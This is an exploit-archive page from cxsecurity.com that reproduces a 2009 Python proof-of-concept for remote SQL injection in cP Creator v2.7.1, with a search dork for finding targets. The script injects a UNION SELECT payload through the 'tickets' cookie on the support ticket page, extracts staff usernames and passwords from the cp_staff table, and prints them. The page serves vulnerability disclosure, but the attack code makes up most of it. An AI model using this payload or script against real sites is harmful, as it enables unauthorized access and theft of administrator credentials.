cP Creator version 2.7.1 remote SQL injection

2009-09-21 / 2009-09-22
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

#!/usr/bin/python ##################################################################################### #### cP Creator v2.7.1 Remote Sql Injection #### ##################################################################################### # # #AUTHOR : Sina Yazdanmehr (R3d.W0rm) # #Discovered by : Sina Yazdanmehr (R3d.W0rm) # #Our Site : http://IrCrash.com -> (Coming Soon Again) # #My Official WebSite : http://R3dW0rm.ir # #IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) # ##################################################################################### # # #Download : http://www.cpcreator.net # # # #Dork : Powered by cP Creator v2.7.1 # # # #*** Magic Quotes gpc = Off *** # # # ###################################### TNX GOD ###################################### import sys,httplib p = '' if len(sys.argv) < 3 : print "\nPowered by : R3d.W0rm" print "Http://IrCrash.Com - Http://R3dW0rm.Ir" print "Usage : code.py [host] /[path]" exit() co = {"Cookie": "tickets=-999' union select 0,concat(0x265E21402A,user,0x3A,pass,0x265E21402A),2,3,4,5,6,7,8 from cp_staff/*;"} c = httplib.HTTPConnection(sys.argv[1],80) c.request("GET", "/" + sys.argv[2] + "/?page=support&task=ticket", p, co) data = c.getresponse().read() if "&^!@*" not in data : print "Attack Failed ." exit() output = data.split("&^!@*") print "\n+-------------------------------------+" print "\nPowered by : R3d.W0rm" print "Http://IrCrash.Com - Http://R3dW0rm.Ir\n" print "+-------------------------------------+" print "\n " + output[1]


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top